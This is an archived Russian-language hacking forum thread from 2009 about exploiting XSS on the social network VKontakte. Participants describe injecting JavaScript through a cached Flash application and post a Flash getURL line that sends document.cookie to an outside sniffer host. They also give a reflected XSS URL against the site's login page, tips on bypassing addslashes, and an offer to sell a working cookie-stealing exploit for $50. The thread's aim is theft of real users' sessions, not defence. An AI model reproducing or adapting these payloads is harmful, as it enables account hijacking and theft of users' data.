Просмотр полной версии : xss VKONTAKTE
На многих форумах и сайтах я встричал ето :
В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.
Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.
Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.
Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1
Как ето здєлать ???
Помогите написать FLASH
Ну и что всеодно очень нужно помогите
возми любой учеьник по флеш....
Как можна взять льбую FLASH і впихнути в ее JAVA которий будєт потом виполнят скрипт і которий будєт входити на сайт фейк І подскажите што нада туда впихнути
В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.
Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.
Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.
Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1
Пример атаки:
http://vkontakte.ru/apps.php?act=s&id=15… (новое окно открывается через 2 секунды)
Как ето здєлать ?????
vitalikis
15.01.2009, 23:18
подскажите нормальную пасивку вк, а то ту что в фильтре друзей и редактирование аудио\заметок и т.д. нормально не заюзаеш
Executor-666
15.01.2009, 23:23
эх были такие милые приложения,которые автоматически создавали группы.
vitalikis
16.01.2009, 00:04
а толку? в названиях группы всё фильтруется
Executor-666
16.01.2009, 00:19
а толку? в названиях группы всё фильтруется
мне бы найти эту программку,что бы группы регить,а потом просматривать номера групп,сечешь тему)
vitalikis
16.01.2009, 00:34
сечешь тему
толкать красивые ид? помоему тема не совсем актуальна...
Executor-666
16.01.2009, 02:01
ну ,хз,кому то может быть и актуальна
Мне етот способ актуален
Подскажити он счас работает вконтакте ????
vitalikis
17.01.2009, 00:49
Подскажити он счас работает вконтакте ????
Не актуален, по крайней мере там теперь есть параметер hash=, ну думаю придумать при большом желании что то можно
З.Ы. тема про xss....
Не актуален, по крайней мере там теперь есть параметер hash=, ну думаю придумать при большом желании что то можно
З.Ы. тема про xss....
Например што ???
vitalikis
17.01.2009, 16:29
например скрипт кторый бы эмулировал нажатие кнопки, но это не кому не нужно
Давайте лучше по теме
сделай во флэше красивую кнопку Play, на ней замути что-то типа
getURL("http://rulix.h18.ru/?+document.cookie");
сделай во флэше красивую кнопку Play, на ней замути что-то типа
getURL("http://rulix.h18.ru/?+document.cookie");
На снифер или на што ???
могу продать пассивку 50$. работает 100%! (уже cookies воровал) ICQ семь 7 шесть 33600
t3cHn0iD
08.04.2009, 19:59
http://vkontakte.ru/login.php?u=1&to=>"><script>alert(/t3cHn0iD/)</script> - нате вам пассивку
t3cHn0iD , респект , если сам нашел. работает)) правда скоро прикроют)
t3cHn0iD
08.04.2009, 20:36
Есть и другие варианты (но о них попозже =)))
http://vkontakte.ru/login.php?u=1&to=>"><script>alert(/t3cHn0iD/)</script> - нате вам пассивку
А што вона делает. Нею как то можно воспользоватса. Для кражи куков или ищо штото. ?
wildshaman
09.04.2009, 19:03
А што вона делает. Нею как то можно воспользоватса. Для кражи куков или ищо штото. ?
с ее помощью можно уроки выучить =\
нужно написать javascript, который обходит addslashes() , а потом написать или скачать сниффер.
про adslashes можно пополробнее )
млин (( даже не наигрался
Сначала '+' зареплейсили (с самого начала воркало, вроде), я даже офигел от оперативности тамошних ботанов )
Потом опять фиксанул, нормально - проработало дольше, чем думалось)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot